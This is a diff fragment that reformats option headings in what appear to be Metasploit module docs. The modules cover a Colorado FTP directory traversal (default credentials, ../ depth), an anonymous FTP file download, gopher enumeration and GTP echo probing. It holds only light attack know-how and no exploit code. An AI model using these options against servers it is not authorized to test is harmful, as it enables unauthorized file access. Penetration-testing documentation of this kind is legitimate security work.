  Default user for Colorado FTP is `ftpuser`

-  **FTPPASS**
+### FTPPASS

  Default password for Colorado FTP is `ftpuser123`

-  **DEPTH**
+### DEPTH

  Default depth of ../ to do is 2 to get back to the root of Colorado FTP.  This can run anywhere, so you may have to play a bit to find the root.

@@ -14,11 +14,11 @@ http://www.efssoft.com/efsfs.exe

 Since the FTP server allows anonymous access, by default, you only need to configure:

-**RHOSTS**
+### RHOSTS

 The FTP server IP address.

-**PATH**
+### PATH

 The file you wish to download. Assume this path starts from C:\

@@ -101,7 +101,7 @@ The following table contains the file types associated with the characters:

 ## Options

-  **PATH**
+### PATH

  It is possible to view content within a directory of the gophermap.  If the initial run shows directory `Directory: foobar`,
  setting **path** to `/foobar` will enumerate the contents of that folder.  Default: [empty string].
@@ -6,7 +6,7 @@ Open-source GGSN implementations can be used as a target for this module as well

 ## Options

-   **The RPORT option**
+### The RPORT option

   This option can be changed to target GTP-U (2152) or GTP-C (2123), which both use the same packet type for echo probing.

--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .2.5
 .3.8